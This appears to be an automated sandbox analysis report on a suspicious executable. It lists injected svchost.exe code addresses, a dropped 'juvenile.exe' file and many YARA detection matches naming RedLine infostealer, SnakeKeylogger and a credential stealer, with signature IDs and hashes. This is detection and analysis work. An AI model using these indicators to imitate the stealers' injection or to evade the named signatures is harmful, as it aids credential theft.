Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086ADE1F	11_2_086ADE1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AE6E0	11_2_086AE6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AE6D0	11_2_086AE6D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A1E8A	11_2_086A1E8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AE288	11_2_086AE288
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A1E98	11_2_086A1E98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A9358	11_2_086A9358
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AEB29	11_2_086AEB29
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A0B23	11_2_086A0B23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AEB38	11_2_086AEB38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A0B30	11_2_086A0B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AF3E8	11_2_086AF3E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A8BC0	11_2_086A8BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AF3D7	11_2_086AF3D7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A17B0	11_2_086A17B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A8BB1	11_2_086A8BB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AEF80	11_2_086AEF80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A179F	11_2_086A179F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AEF90	11_2_086AEF90

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: String function: 004BF8A0 appears 35 times
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: String function: 004B6AC0 appears 42 times
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: String function: 004AEC2F appears 68 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0040D606 appears 48 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0040E1D8 appears 88 times
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: String function: 008F6AC0 appears 42 times
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: String function: 008FF8A0 appears 35 times
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: String function: 008EEC2F appears 68 times

Source: FACT0987789000900.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.2.juvenile.exe.3da0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.juvenile.exe.3c60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
